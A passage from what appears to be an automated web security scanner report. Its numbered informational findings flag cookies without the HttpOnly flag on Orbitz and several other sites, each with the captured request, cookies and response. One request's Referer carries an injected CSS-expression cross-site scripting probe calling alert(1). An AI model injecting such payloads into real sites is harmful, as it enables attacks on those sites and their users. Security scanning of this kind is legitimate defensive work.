Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573834583:ss=1296573790782
Content-Length: 2081

<ClientEventSet PostTimeStamp="1296573834691" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="16969" DateSince1970="1296573815246" PageId="ID9H23M18S277R0.8391744396649301" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 91
Date: Tue, 01 Feb 2011 15:23:11 GMT
Set-Cookie: NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e34fb045525d5f4f58455e445a4a4217b9;path=/
Cache-Control: private
Content-Length: 91

<html>
<body>
Response
<hr>
Read 2081 bytes in 24ms.
</body>
</html>

12.729. http://www.orbitz.com/tealeaf.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/tealeaf.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tealeaf.jsp HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Origin: http://www.orbitz.com
X-TeaLeaf-Page-Cui-Bytes: 2609
X-TeaLeaf-Page-Cui-Events: 4
X-TeaLeaf-Page-Dwell: 86688192
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.10.04.1
Content-Type: text/xml
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: BeforeUnload
X-TeaLeaf-Page-Url: /shop/hotelsearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; adRotator=true; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D
Content-Length: 266

<ClientEventSet PostTimeStamp="1296660578538" ><ClientEvent Count="4" Type="PERFORMANCE" SubType="BeforeUnload" MouseMove="False" Action="No Submit" TimeDuration="86688192" DateSince1970="129666057853
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 89
Date: Wed, 02 Feb 2011 15:28:48 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 89

<html>
<body>
Response
<hr>
Read 266 bytes in 0ms.
</body>
</html>

12.730. https://www.orbitz.com/App/PartnerTracking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/App/PartnerTracking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/PartnerTracking?partnerUrl=TRAVELERUPDATE&z=2eb4&r=7 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: https://www.orbitz.com/Secure/PartnerTracking?partnerUrl=TRAVELERUPDATE&z=2eb4&r=7
Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

12.731. https://www.orbitz.com/App/ViewMyAccount previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/App/ViewMyAccount

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewMyAccount?z=2eb3&r=6&shadowing=false HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: https://www.orbitz.com/Secure/ViewMyAccount?z=2eb3&r=6&shadowing=false
Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

12.732. https://www.orbitz.com/Secure/SignIn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/SignIn

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=D3DD8128C5377A40141A9858208488B0; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.733. https://www.orbitz.com/Secure/ViewSecureCalendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/ViewSecureCalendar

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=95571C5B16DE6EDEF581BE2B2323412E; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.734. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/ViewSetupCareAlertsProfile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=E880838379B672AED84437867BF4C6BA; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.735. http://www.orbitzforagents.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitzforagents.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

NSC_JOqdce5yea1nk3xda1jlzlbmyalwvbu=ffffffff09e3483145525d5f4f58455e445a4a423651;path=/
NSC_xxx.pscjuagpsbhfout.dpn.80_gxe=ffffffff09e308b345525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.orbitzforagents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 16:16:43 GMT
Server: Apache/2.2.3 (CentOS)
Location: https://www.orbitzforagents.com/sp/OrbitzforAgents/HomePage
Content-Length: 331
Keep-Alive: timeout=5, max=2500
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_JOqdce5yea1nk3xda1jlzlbmyalwvbu=ffffffff09e3483145525d5f4f58455e445a4a423651;path=/
Set-Cookie: NSC_xxx.pscjuagpsbhfout.dpn.80_gxe=ffffffff09e308b345525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.orbitzforagents.com/sp/OrbitzforAge
...[SNIP]...

12.736. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.owasp.org
Path:	/index.php/XSS_(Cross_Site_Scripting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=0f2081f46781753f4bba5901cbda15b0; expires=Fri, 03-Feb-2012 07:49:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php/XSS_(Cross_Site_Scripting HTTP/1.1
Host: www.owasp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.737. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.owasp.org
Path:	/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=b37c1879c52d48eed3346aeb5dce8a8d; expires=Fri, 03-Feb-2012 07:49:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet HTTP/1.1
Host: www.owasp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.738. http://www.parentsconnect.com/eat/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parentsconnect.com
Path:	/eat/index.jhtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ReturnUrl=http://www.parentsconnect.com/eat/index.jhtml; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /eat/index.jhtml HTTP/1.1
Host: www.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: http://www.parentsconnect.com/flux/widgetRedirect.jhtml?returnUrl=http://www.parentsconnect.com/flux/login_sync.jhtml
Expires: Wed, 02 Feb 2011 19:27:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 19:27:30 GMT
Connection: close
Set-Cookie: ReturnUrl=http://www.parentsconnect.com/eat/index.jhtml; path=/

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:27 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1129
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 1129

var copy = 'Save big on all inclusive getaways';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=allinclusive&cnt=PKH'
var target = '_parent';
// target is '_top' for internal lin
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:27 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1118
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 1118

var copy = 'Up to 30% off select Disney hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=disney&cnt=PKH'
var target = '_parent';
// target is '_top' for internal links, '_
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe& HTTP/1.1
Accept: */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.revresda.com
Proxy-Connection: Keep-Alive
Cookie: NGUserID=aeb2124-3312-952975028-6

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:53 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 746
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/
Content-Length: 746

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4;sz=728x90;ord=bkkcdnf,bguqjkndpyrh?\" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBOR
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revresda.com
Path:	/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e308be45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

